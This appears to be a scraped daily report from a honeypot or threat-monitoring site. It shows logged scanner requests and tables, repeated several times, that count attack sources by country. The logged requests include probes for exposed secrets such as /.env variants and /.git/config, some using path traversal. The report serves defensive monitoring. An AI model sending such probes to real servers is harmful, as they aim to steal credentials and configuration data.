284	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03aw\xC3!\x84G\x17\xFA\xA5\xE2\xC0\x01F\xC0\x10\x8Cr\x8FLLc\x06\xEFAyH\xB3\xF9V\x98A( \x0E\xAFvgs\xB5\xCF\xDASR\xA15\x80\x225\x05\x9FZ\xB4@+3 t\xA9*\xCD\xB8a/’/\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
285	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x16 i \xDC\x07W\x90S\x08R
286	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xCF\xCB\x19\xBE\xEA\xEA
287	1	GET /media../.git/config HTTP/1.1
288	1	GET /.env.save HTTP/1.1
289	1	GET /dev/.git/config HTTP/1.1
290	1	GET /.env.testing HTTP/1.1
291	1	GET /.env.dev.local HTTP/1.1
292	1	GET /server/.git/config HTTP/1.1
293	1	GET /media/.git/config HTTP/1.1
294	1	GET /assets../.git/config HTTP/1.1
295	1	GET /static../.git/config HTTP/1.1
296	1	GET /.env.development.local HTTP/1.1
297	1	GET /.env.dist HTTP/1.1
298	1	GET /admin/.git/config HTTP/1.1
299	1	GET /.well-known/security.txt HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	262	NL
1	202	US
2	154	HK
3	121	GB
4	77	CN
5	64	PL
6	59	CH
7	48	VN
8	35	DE
9	19	TW
10	17	BG
11	15	RU
12	11	IN
13	10	SC
14	8	PT
15	8	FR
16	6	NG
17	5	TR
18	5	AO
19	4	BR
20	4	GH
21	3	HU
22	3	CA
23	3	IT
24	3	BE
25	3	SG
26	3	UA
27	3	ZA
28	2	LU
29	2	MD
30	2	JP
31	2	ID
32	2	CZ
33	2	IR
34	1	AR
35	1	CG
36	1	TH
37	1	LV

Report: 2025-02-19

19 February 2025·5908 words

Repport Daily

Report: 2025-02-18

18 February 2025·6211 words

Repport Daily

Report: 2025-02-17

17 February 2025·10207 words

Repport Daily

	number_of_occurence	country_iso_code
0	262	NL
1	202	US
2	154	HK
3	121	GB
4	77	CN
5	64	PL
6	59	CH
7	48	VN
8	35	DE
9	19	TW
10	17	BG
11	15	RU
12	11	IN
13	10	SC
14	8	PT
15	8	FR
16	6	NG
17	5	TR
18	5	AO
19	4	BR
20	4	GH
21	3	HU
22	3	CA
23	3	IT
24	3	BE
25	3	SG
26	3	UA
27	3	ZA
28	2	LU
29	2	MD
30	2	JP
31	2	ID
32	2	CZ
33	2	IR
34	1	AR
35	1	CG
36	1	TH
37	1	LV

	number_of_occurence	country_iso_code
0	262	NL
1	202	US
2	154	HK
3	121	GB
4	77	CN
5	64	PL
6	59	CH
7	48	VN
8	35	DE
9	19	TW
10	17	BG
11	15	RU
12	11	IN
13	10	SC
14	8	PT
15	8	FR
16	6	NG
17	5	TR
18	5	AO
19	4	BR
20	4	GH
21	3	HU
22	3	CA
23	3	IT
24	3	BE
25	3	SG
26	3	UA
27	3	ZA
28	2	LU
29	2	MD
30	2	JP
31	2	ID
32	2	CZ
33	2	IR
34	1	AR
35	1	CG
36	1	TH
37	1	LV

Daily Report: 2025-02-20#

ot_simplified_report#

botnet_dropper_behaviour#

list_of_source_IP_addresses#

user_agent#

request#

country_iso_code#

Related

Daily Report: 2025-02-20
#

ot_simplified_report
#

botnet_dropper_behaviour
#

list_of_source_IP_addresses
#

user_agent
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	262	NL
1	202	US
2	154	HK
3	121	GB
4	77	CN
5	64	PL
6	59	CH
7	48	VN
8	35	DE
9	19	TW
10	17	BG
11	15	RU
12	11	IN
13	10	SC
14	8	PT
15	8	FR
16	6	NG
17	5	TR
18	5	AO
19	4	BR
20	4	GH
21	3	HU
22	3	CA
23	3	IT
24	3	BE
25	3	SG
26	3	UA
27	3	ZA
28	2	LU
29	2	MD
30	2	JP
31	2	ID
32	2	CZ
33	2	IR
34	1	AR
35	1	CG
36	1	TH
37	1	LV